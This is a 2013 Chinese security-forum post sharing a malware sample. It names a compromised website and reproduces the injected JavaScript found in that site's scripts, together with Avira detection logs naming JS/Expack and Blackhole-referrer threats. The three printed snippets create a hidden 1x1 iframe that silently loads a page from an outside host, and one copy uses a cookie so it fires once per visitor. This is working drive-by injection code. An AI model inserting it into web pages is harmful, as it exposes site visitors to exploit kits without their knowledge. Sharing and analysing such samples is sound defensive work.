收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 裏面(給力!)
返回列表 发新帖
查看: 1221|回复: 0
收起左侧

[已鉴定] 裏面(給力!)

[复制链接]
fireold
发表于 2013-8-17 10:05:15 | 显示全部楼层 |阅读模式
  1. http://hatharasoulallah.islamtoday.net/?offset=99300
复制代码

  1. function zzzfff() {
  2.      var blr = document.createElement('iframe');

  4.      blr.src = 'http://cjmunday.com/sdennis/counter.php';
  5.      blr.style.position = 'absolute';
  6.      blr.style.border = '0';
  7.      blr.style.height = '1px';
  8.      blr.style.width = '1px';
  9.      blr.style.left = '1px';
  10.      blr.style.top = '1px';

  12.      if (!document.getElementById('blr')) {
  13.          document.write('<div id=\'blr\'></div>');
  14.          document.getElementById('blr').appendChild(blr);
  15.      }
  16. }

  18. function SetCookie(cookieName, cookieValue, nDays, path) {
  19.      var today = new Date();
  20.      var expire = new Date();
  21.      if (nDays == null || nDays == 0) nDays = 1;
  22.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  23.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  24. }

  26. function GetCookie(name) {
  27.      var start = document.cookie.indexOf(name + "=");
  28.      var len = start + name.length + 1;
  29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  30.          return null;
  31.      }
  32.      if (start == -1) return null;
  33.      var end = document.cookie.indexOf(";", len);
  34.      if (end == -1) end = document.cookie.length;
  35.      return unescape(document.cookie.substring(len, end));
  36. }
  37. if (navigator.cookieEnabled) {
  38.      if (GetCookie('visited_uq') == 55) {} else {
  39.          SetCookie('visited_uq', '55', '1', '/');

  41.          zzzfff();
  42.      }
  43. }
复制代码

  1. function zzzfff() {
  2.      var pgp = document.createElement('iframe');

  4.      pgp.src = 'http://cjmunday.com/sdennis/counter.php';
  5.      pgp.style.position = 'absolute';
  6.      pgp.style.border = '0';
  7.      pgp.style.height = '1px';
  8.      pgp.style.width = '1px';
  9.      pgp.style.left = '1px';
  10.      pgp.style.top = '1px';

  12.      if (!document.getElementById('pgp')) {
  13.          document.write('<div id=\'pgp\'></div>');
  14.          document.getElementById('pgp').appendChild(pgp);
  15.      }
  16. }
复制代码

  1. function zzzfff() {
  2.      var qqwgr = document.createElement('iframe');

  4.      qqwgr.src = 'http://cjmunday.com/sdennis/counter.php';
  5.      qqwgr.style.position = 'absolute';
  6.      qqwgr.style.border = '0';
  7.      qqwgr.style.height = '1px';
  8.      qqwgr.style.width = '1px';
  9.      qqwgr.style.left = '1px';
  10.      qqwgr.style.top = '1px';

  12.      if (!document.getElementById('qqwgr')) {
  13.          document.write('<div id=\'qqwgr\'></div>');
  14.          document.getElementById('qqwgr').appendChild(qqwgr);
  15.      }
  16. }
复制代码



Avira
2013/8/17 上午 09:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\main[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '4c405487.qua' 名稱底下的隔離區目錄。.

2013/8/17 上午 09:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\jScrollPane[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '54d17b3e.qua' 名稱底下的隔離區目錄。.

2013/8/17 上午 09:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\dhtmlwindow[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '1eea0e66.qua' 名稱底下的隔離區目錄。.

2013/8/17 上午 09:58 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        859
      目錄數:        0
      惡意程式碼數:        4
      警告數:        0

2013/8/17 上午 09:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\jquery.tools.min[1].js'
      包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
      已採取動作:
      檔案會移動至 '78dc41dd.qua' 名稱底下的隔離區目錄。.

2013/8/17 上午 09:58 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\hatharasoulallah_islamtoday_net[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26003.
      檔案無法刪除!.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '4ccc5f54.qua' 名稱底下的隔離區目錄。.

2013/8/17 上午 09:58 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        856
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\jquery.tools.min[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\jquery.tools.min[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\main[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\jScrollPane[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/17 上午 09:58 [Web Protection] 發現惡意程式碼
      從 URL "http://hatharasoulallah.islamtoday.net/js/jquery.tools.min.js?v=1" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\dhtmlwindow[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\jScrollPane[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/17 上午 09:58 [Web Protection] 發現惡意程式碼
      從 URL "http://hatharasoulallah.islamtoday.net/js/main.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\dhtmlwindow[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/17 上午 09:58 [Web Protection] 發現惡意程式碼
      從 URL "http://hatharasoulallah.islamtoday.net/js/jScrollPane.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/17 上午 09:58 [Web Protection] 發現惡意程式碼
      從 URL "http://hatharasoulallah.islamtoday.net/windowfiles/dhtmlwindow.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/8/17 上午 09:58 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\hatharasoulallah_islamtoday_net[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]'
      執行的動作:傳輸至掃描程式

2013/8/17 上午 09:58 [Web Protection] 發現惡意程式碼
      從 URL "http://hatharasoulallah.islamtoday.net/?offset=99300" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]。
      已採取動作:已略過




fs22.jpg
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 02:46 , Processed in 0.141461 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表